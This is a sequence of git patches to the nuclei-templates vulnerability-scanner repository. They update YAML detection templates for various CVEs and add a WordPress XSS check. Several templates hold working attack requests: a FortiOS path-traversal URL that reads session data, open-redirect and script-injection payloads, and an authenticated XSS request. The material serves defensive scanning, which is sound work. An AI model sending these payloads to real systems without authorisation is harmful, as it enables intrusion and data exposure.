From 101b139dfd6d6ff9ddcead0b25a29b61baee248d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 Jun 2022 01:02:35 +0530 Subject: [PATCH 01/21] Update sym404.yaml --- vulnerabilities/wordpress/sym404.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/wordpress/sym404.yaml b/vulnerabilities/wordpress/sym404.yaml index 3caf1c5a27..7f5c93cba2 100644 --- a/vulnerabilities/wordpress/sym404.yaml +++ b/vulnerabilities/wordpress/sym404.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: High description: Searches for sensitive directories present in the sym404. + reference: + - https://twitter.com/momika233/status/1540325055280070656 metadata: verified: true google-dork: inurl:"/wp-includes/sym404/" From f95372222b49bbd43660cd090d1c27f01566077c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Jun 2022 07:47:04 +0530 Subject: [PATCH 02/21] Update CVE-2020-20982.yaml --- cves/2020/CVE-2020-20982.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-20982.yaml b/cves/2020/CVE-2020-20982.yaml index 0c9b36e71f..71b8c59ff6 100644 --- a/cves/2020/CVE-2020-20982.yaml +++ b/cves/2020/CVE-2020-20982.yaml @@ -4,7 +4,7 @@ info: name: shadoweb wdja v1.5.1 - Cross-Site Scripting author: pikpikcu severity: critical - description: "shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php." + description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 @@ -34,4 +34,8 @@ requests: words: - 'text/html' + - type: status + status: + - 200 + # Enhanced by mp on 2022/04/27 From 75c6c22a27bdf863911e6dae28ce725c490ffca8 Mon Sep 17 00:00:00 2001 From: Krishna Agarwal <85845881+Kr1shna4garwal@users.noreply.github.com> Date: Sat, 25 Jun 2022 12:38:56 +0530 Subject: [PATCH 04/21] Added URL encoded payload (#4664) --- vulnerabilities/generic/open-redirect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7e6cd07c7e..9882c469e4 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -39,6 +39,7 @@ requests: - '//\tinteract.sh/' - '//interact.sh/%2F..' - '//interact.sh//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' - '//interact.sh@//' - '//interact.sh\tinteract.sh/' - '//https://interact.sh@//' @@ -119,4 +120,4 @@ requests: - 302 - 307 - 308 - condition: or \ No newline at end of file + condition: or From c80fea4a8ccbe242f19c025d20b5a18f607d36ba Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Sat, 25 Jun 2022 03:14:58 -0400 Subject: [PATCH 06/21] Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo --- cves/2021/CVE-2021-24146.yaml | 7 +++++-- cves/2021/CVE-2021-24226.yaml | 7 ++++--- cves/2021/CVE-2021-24278.yaml | 10 ++++++---- cves/2021/CVE-2021-24340.yaml | 7 +++++-- cves/2021/CVE-2021-24750.yaml | 8 +++++--- cves/2021/CVE-2021-3017.yaml | 2 +- cves/2021/CVE-2021-46379.yaml | 9 +++++---- cves/2022/CVE-2022-1904.yaml | 5 ++++- cves/2022/CVE-2022-26148.yaml | 2 +- 9 files changed, 36 insertions(+), 21 deletions(-) diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml index 3b9fa118f5..483136159e 100644 --- a/cves/2021/CVE-2021-24146.yaml +++ b/cves/2021/CVE-2021-24146.yaml @@ -1,13 +1,14 @@ id: CVE-2021-24146 info: - name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export + name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure author: random_robbie severity: high - description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. + description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. reference: - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-24146 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 @@ -32,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/06/22 diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index 80cb8fab90..53828a49bf 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -1,11 +1,10 @@ id: CVE-2021-24226 info: - name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage + name: AccessAlly <3.5.7 - Sensitive Information Leakage author: dhiyaneshDK severity: high - description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which - contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. + description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required. reference: - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 @@ -32,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/06/22 diff --git a/cves/2021/CVE-2021-24278.yaml b/cves/2021/CVE-2021-24278.yaml index 05508a9689..db00615e37 100644 --- a/cves/2021/CVE-2021-24278.yaml +++ b/cves/2021/CVE-2021-24278.yaml @@ -1,14 +1,14 @@ id: CVE-2021-24278 info: - name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation + name: WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation author: 2rs3c severity: high - description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. + description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278 - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413 - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24278 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -43,4 +43,6 @@ requests: - type: regex part: body regex: - - '"nonce":"[a-f0-9]+"' \ No newline at end of file + - '"nonce":"[a-f0-9]+"' + +# Enhanced by mp on 2022/06/22 diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml index d23a363deb..83981c0099 100644 --- a/cves/2021/CVE-2021-24340.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -1,15 +1,16 @@ id: CVE-2021-24340 info: - name: WordPress Plugin WP Statistics < 13.0.8 - Unauthenticated Time-Based Blind SQL Injection + name: WordPress Statistics <13.0.8 - Blind SQL Injection author: lotusdll severity: high - description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. + description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c + - https://nvd.nist.gov/vuln/detail/CVE-2021-24340 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -49,3 +50,5 @@ requests: - type: dsl dsl: - compare_versions(version, '< 13.0.8') + +# Enhanced by mp on 2022/06/22 diff --git a/cves/2021/CVE-2021-24750.yaml b/cves/2021/CVE-2021-24750.yaml index 9e34e7e0ac..5cd49508c5 100644 --- a/cves/2021/CVE-2021-24750.yaml +++ b/cves/2021/CVE-2021-24750.yaml @@ -1,15 +1,15 @@ id: CVE-2021-24750 info: - name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI + name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection author: cckuakilong severity: high - description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. + description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks. reference: - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py - - https://nvd.nist.gov/vuln/detail/CVE-2021-24750 - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de - https://plugins.trac.wordpress.org/changeset/2622268 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24750 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -43,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/06/22 diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 7a07931362..9dc06e0212 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -1,7 +1,7 @@ id: CVE-2021-3017 info: - name: Intelbras WIN 300/WRN 342 Credential Disclosure + name: Intelbras WIN 300/WRN 342 - Credentials Disclosure author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml index a64ce02434..db866ee120 100644 --- a/cves/2021/CVE-2021-46379.yaml +++ b/cves/2021/CVE-2021-46379.yaml @@ -4,12 +4,11 @@ info: name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect author: 0x_Akoko severity: medium - description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. + description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites. reference: - - https://www.opencve.io/cve/CVE-2021-46379 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46379 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view - - https://www.cvedetails.com/cve/CVE-2021-46379 - - https://www.dlink.com/en/security-bulletin/ + - https://www.dlink.com/en/security-bulletin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -29,3 +28,5 @@ requests: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by cs 06/22/2022 diff --git a/cves/2022/CVE-2022-1904.yaml b/cves/2022/CVE-2022-1904.yaml index b1fc88e18e..21521ab7e8 100644 --- a/cves/2022/CVE-2022-1904.yaml +++ b/cves/2022/CVE-2022-1904.yaml @@ -4,7 +4,10 @@ info: name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting author: Akincibor severity: medium - description: The plugin does not sanitise and escape parameter before outputting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a Reflected Cross-Site Scripting. + description: | + The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting. + classification: + cve-id: CVE-2022-1904 reference: - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904 diff --git a/cves/2022/CVE-2022-26148.yaml b/cves/2022/CVE-2022-26148.yaml index 315b0b25a8..145648a2d6 100644 --- a/cves/2022/CVE-2022-26148.yaml +++ b/cves/2022/CVE-2022-26148.yaml @@ -1,7 +1,7 @@ id: CVE-2022-26148 info: - name: Grafana & Zabbix Integration - Credential Disclosure + name: Grafana & Zabbix Integration - Credentials Disclosure author: Geekby severity: critical description: | From 167ff1e909587f10d44bd6fe674adc99f475f385 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 25 Jun 2022 07:26:43 +0000 Subject: [PATCH 08/21] Auto Generated CVE annotations [Sat Jun 25 07:26:43 UTC 2022] :robot: --- cves/2021/CVE-2021-46379.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml index db866ee120..270692bd08 100644 --- a/cves/2021/CVE-2021-46379.yaml +++ b/cves/2021/CVE-2021-46379.yaml @@ -9,6 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-46379 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view - https://www.dlink.com/en/security-bulletin + - https://www.dlink.com/en/security-bulletin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 From c0d51a6efa8ef592833f75b8933441e1c9204c10 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Jun 2022 13:18:45 +0530 Subject: [PATCH 09/21] Update CVE-2018-13379.yaml --- cves/2018/CVE-2018-13379.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index 176a17dba7..ca3b635eb6 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml @@ -14,15 +14,19 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 - tags: cve,cve2018,fortios,cisa + metadata: + verified: true + shodan-query: http.html:"/remote/login" "xxxxxxxx" + tags: cve,cve2018,fortios,cisa,lfi requests: - method: GET path: - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" - matchers: - - type: word - words: - - "var fgt_lang" + matchers: + - type: regex + part: body + regex: + - '^var fgt_lang =' # Enhanced by mp on 2022/05/12 From 0c4c64ed5cdafd7ea343c11ed8923659547f286c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Jun 2022 14:11:05 +0530 Subject: [PATCH 11/21] Create new-user-approve-xss.yaml --- .../wordpress/new-user-approve-xss.yaml | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 vulnerabilities/wordpress/new-user-approve-xss.yaml diff --git a/vulnerabilities/wordpress/new-user-approve-xss.yaml b/vulnerabilities/wordpress/new-user-approve-xss.yaml new file mode 100644 index 0000000000..7efb421348 --- /dev/null +++ b/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -0,0 +1,45 @@ +id: new-user-approve-xss + +info: + name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a + - https://wordpress.org/plugins/new-user-approve + metadata: + verified: true + tags: wp,wordpress,xss,authenticated,wp-plugin + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '?a">&new-user-approve-settings' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From ce149b9f7625042e1d335e468dd4578bbadb13cf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 25 Jun 2022 09:25:18 +0000 Subject: [PATCH 13/21] Auto Generated New Template Addition List [Sat Jun 25 09:25:18 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4eb8ec55c6..248f8488d6 100644 --- a/.new-additions +++ b/.new-additions @@ -19,4 +19,5 @@ token-spray/api-digitalocean.yaml token-spray/api-segment.yaml vulnerabilities/other/royalevent/royalevent-management-xss.yaml vulnerabilities/other/royalevent/royalevent-stored-xss.yaml +vulnerabilities/wordpress/new-user-approve-xss.yaml vulnerabilities/wordpress/sym404.yaml From e0d0097a46a12817fda9fd8d59e05b87c1bc435e Mon Sep 17 00:00:00 2001 From: Arman <65326024+tes5hacks@users.noreply.github.com> Date: Mon, 27 Jun 2022 04:00:31 -0400 Subject: [PATCH 14/21] Create intercom.yaml (#4612) * Create intercom.yaml * lint fixes Co-authored-by: sandeep --- technologies/intercom.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 technologies/intercom.yaml diff --git a/technologies/intercom.yaml b/technologies/intercom.yaml new file mode 100644 index 0000000000..bec3adb077 --- /dev/null +++ b/technologies/intercom.yaml @@ -0,0 +1,20 @@ +id: intercom + +info: + name: Intercom widget detection + author: tess + severity: info + tags: intercom,tech + reference: https://www.intercom.com + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 3 + matchers: + - type: word + words: + - 'intercom' \ No newline at end of file From 230b1a3fb569fae78a48067e46693af3142be574 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Jun 2022 08:00:48 +0000 Subject: [PATCH 15/21] Auto Generated New Template Addition List [Mon Jun 27 08:00:48 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 248f8488d6..52198e50d3 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ exposed-panels/teamcity-login-panel.yaml misconfiguration/teamcity/teamcity-guest-login-enabled.yaml misconfiguration/teamcity/teamcity-registration-enabled.yaml misconfiguration/wp-registration-enabled.yaml +technologies/intercom.yaml token-spray/api-digitalocean.yaml token-spray/api-segment.yaml vulnerabilities/other/royalevent/royalevent-management-xss.yaml From dda8a8aa12a113f7032fa42b4e56df00ddbbfc88 Mon Sep 17 00:00:00 2001 From: Ice3man Date: Mon, 27 Jun 2022 14:16:45 +0530 Subject: [PATCH 16/21] Added do not edit message to nuclei-ignore (#4674) --- .nuclei-ignore | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.nuclei-ignore b/.nuclei-ignore index 832ecac550..31dc7b597f 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -3,6 +3,11 @@ # # This is default list of tags and files to excluded from default nuclei scan. # More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion +# +# ============ DO NOT EDIT ============ +# Automatically updated by nuclei on execution from nuclei-templates +# User changes should be in nuclei config file +# ============ DO NOT EDIT ============ # tags is a list of tags to ignore execution for # unless asked for by the user. From 87c9007f60c9c84655b760b5a5f51c01c41ca730 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 27 Jun 2022 14:59:47 +0530 Subject: [PATCH 18/21] added missing cve tags --- cves/2005/CVE-2005-3344.yaml | 4 ++-- cves/2008/CVE-2008-5587.yaml | 2 +- cves/2016/CVE-2016-1555.yaml | 2 +- cves/2019/CVE-2019-16931.yaml | 2 +- cves/2020/CVE-2020-26876.yaml | 6 +++--- cves/2021/CVE-2021-25120.yaml | 2 +- cves/2021/CVE-2021-42071.yaml | 2 +- 7 files changed, 10 insertions(+), 10 deletions(-) diff --git a/cves/2005/CVE-2005-3344.yaml b/cves/2005/CVE-2005-3344.yaml index 9a01ed2fa9..b0c576e378 100644 --- a/cves/2005/CVE-2005-3344.yaml +++ b/cves/2005/CVE-2005-3344.yaml @@ -12,13 +12,14 @@ info: - http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337 classification: cve-id: CVE-2005-3344 - tags: horde,unauth + tags: cve,cve2005,horde,unauth requests: - method: GET path: - "{{BaseURL}}/horde/admin/user.php" - "{{BaseURL}}/admin/user.php" + headers: Content-Type: text/html @@ -28,7 +29,6 @@ requests: - type: word words: - "Horde :: User Administration" - condition: and - type: status status: diff --git a/cves/2008/CVE-2008-5587.yaml b/cves/2008/CVE-2008-5587.yaml index b9564b91b0..492c9f3f17 100644 --- a/cves/2008/CVE-2008-5587.yaml +++ b/cves/2008/CVE-2008-5587.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2008-5587 metadata: shodan-query: http.title:"phpPgAdmin" - tags: cve2008,lfi,phppgadmin + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET diff --git a/cves/2016/CVE-2016-1555.yaml b/cves/2016/CVE-2016-1555.yaml index 0afd89e84c..8351a4be01 100644 --- a/cves/2016/CVE-2016-1555.yaml +++ b/cves/2016/CVE-2016-1555.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - tags: netgear,rce,oast,router + tags: cve,cve2016,netgear,rce,oast,router requests: - raw: diff --git a/cves/2019/CVE-2019-16931.yaml b/cves/2019/CVE-2019-16931.yaml index ecf3414317..92723cdf96 100644 --- a/cves/2019/CVE-2019-16931.yaml +++ b/cves/2019/CVE-2019-16931.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: wp-plugin,wordpress,wp,xss,unauth + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth requests: - raw: diff --git a/cves/2020/CVE-2020-26876.yaml b/cves/2020/CVE-2020-26876.yaml index 1a49f7a287..3908afcb52 100644 --- a/cves/2020/CVE-2020-26876.yaml +++ b/cves/2020/CVE-2020-26876.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-26876 cwe-id: CWE-306 - tags: wordpress,plugin + tags: cve,cve2020,wordpress,wp-plugin,exposure requests: - method: GET @@ -25,16 +25,16 @@ requests: matchers-condition: and matchers: - type: regex + part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - part: body - type: word + part: header words: - "application/json" - part: header - type: status status: diff --git a/cves/2021/CVE-2021-25120.yaml b/cves/2021/CVE-2021-25120.yaml index 3eaedf7963..5b471c1c42 100644 --- a/cves/2021/CVE-2021-25120.yaml +++ b/cves/2021/CVE-2021-25120.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25120 cwe-id: CWE-79 - tags: wordpress,wp-plugin,xss,authenticated + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated requests: - raw: diff --git a/cves/2021/CVE-2021-42071.yaml b/cves/2021/CVE-2021-42071.yaml index bcd30e2e28..00c590c1ef 100644 --- a/cves/2021/CVE-2021-42071.yaml +++ b/cves/2021/CVE-2021-42071.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42071 cwe-id: CWE-78 - tags: visualtools,rce,oast,injection + tags: cve,cve2021,visualtools,rce,oast,injection requests: - raw: From 0180779d24b7a366f1e2f3bb0764e52579ceb0ca Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 27 Jun 2022 15:13:42 +0530 Subject: [PATCH 20/21] template id and tags fixes --- cves/2009/CVE-2009-5020.yaml | 2 +- cves/2012/CVE-2012-4547.yaml | 2 +- cves/2014/CVE-2014-9614.yaml | 2 +- cves/2016/CVE-2016-10924.yaml | 2 +- cves/2020/CVE-2020-11529.yaml | 2 +- cves/2021/CVE-2021-24358.yaml | 4 ++-- cves/2021/CVE-2021-25033.yaml | 4 ++-- cves/2021/CVE-2021-25063.yaml | 2 +- cves/2021/CVE-2021-3223.yaml | 2 +- 9 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml index c4f1e581a5..6e9cbc2706 100644 --- a/cves/2009/CVE-2009-5020.yaml +++ b/cves/2009/CVE-2009-5020.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2009-5020 cwe-id: CWE-601 - tags: cve,cve2020,redirect,awstats + tags: cve,cve2009,redirect,awstats requests: - method: GET diff --git a/cves/2012/CVE-2012-4547.yaml b/cves/2012/CVE-2012-4547.yaml index 4a35ca2a5e..9025770e0a 100644 --- a/cves/2012/CVE-2012-4547.yaml +++ b/cves/2012/CVE-2012-4547.yaml @@ -12,7 +12,7 @@ info: - http://openwall.com/lists/oss-security/2012/10/29/7 classification: cve-id: CVE-2012-4547 - tags: cve,cve2020,xss,awstats + tags: cve,cve2012,xss,awstats requests: - method: GET diff --git a/cves/2014/CVE-2014-9614.yaml b/cves/2014/CVE-2014-9614.yaml index b71a33cd9c..38595c2b6b 100644 --- a/cves/2014/CVE-2014-9614.yaml +++ b/cves/2014/CVE-2014-9614.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 - tags: cve,cve2021,netsweeper,default-login + tags: cve,cve2014,netsweeper,default-login requests: - raw: diff --git a/cves/2016/CVE-2016-10924.yaml b/cves/2016/CVE-2016-10924.yaml index bd985936f8..3c6f212e55 100644 --- a/cves/2016/CVE-2016-10924.yaml +++ b/cves/2016/CVE-2016-10924.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook,wp + tags: cve,cve2016,wp-plugin,lfi,wordpress,ebook,wp requests: - method: GET diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index 9d9059661f..c4fcacdf4f 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-11529 cwe-id: CWE-601 - tags: cve,cve2019,redirect,grav,getgrav + tags: cve,cve2020,redirect,grav,getgrav requests: - method: GET diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml index b14b8c85ef..883e4c1a9d 100644 --- a/cves/2021/CVE-2021-24358.yaml +++ b/cves/2021/CVE-2021-24358.yaml @@ -1,4 +1,4 @@ -id: elementorpage-open-redirect +id: CVE-2021-24358 info: name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24358 cwe-id: CWE-601 - tags: wordpress,redirect,wp-plugin,elementor,wp + tags: cve,cve2021,wordpress,redirect,wp-plugin,elementor,wp requests: - raw: diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml index 83c815b2b8..7d66072b8e 100644 --- a/cves/2021/CVE-2021-25033.yaml +++ b/cves/2021/CVE-2021-25033.yaml @@ -1,4 +1,4 @@ -id: noptin-open-redirect +id: CVE-2021-25033 info: name: Noptin < 1.6.5 - Open Redirect @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25033 cwe-id: CWE-601 - tags: wordpress,redirect,wp-plugin,noptin,wp + tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp requests: - method: GET diff --git a/cves/2021/CVE-2021-25063.yaml b/cves/2021/CVE-2021-25063.yaml index 48a654dc21..6647da3e17 100644 --- a/cves/2021/CVE-2021-25063.yaml +++ b/cves/2021/CVE-2021-25063.yaml @@ -12,7 +12,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 - tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated + tags: cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated requests: - raw: diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 